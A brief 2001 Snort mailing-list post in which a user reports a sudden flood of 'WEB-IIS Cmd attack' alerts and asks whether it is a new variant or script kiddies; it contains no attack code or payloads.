Snort mailing list archives
WEB-IIS Cmd attack
From: Togan Muftuoglu <toganm () users sourceforge net>
Date: Tue, 18 Sep 2001 17:34:12 +0300
Hi,

Suddenly there is a flood of Web-IIS Cmd attacks; this is just a tiny bit of it. Is this a new variant, or script kiddies around?

TIA

----- End forwarded message -----

--
Togan Muftuoglu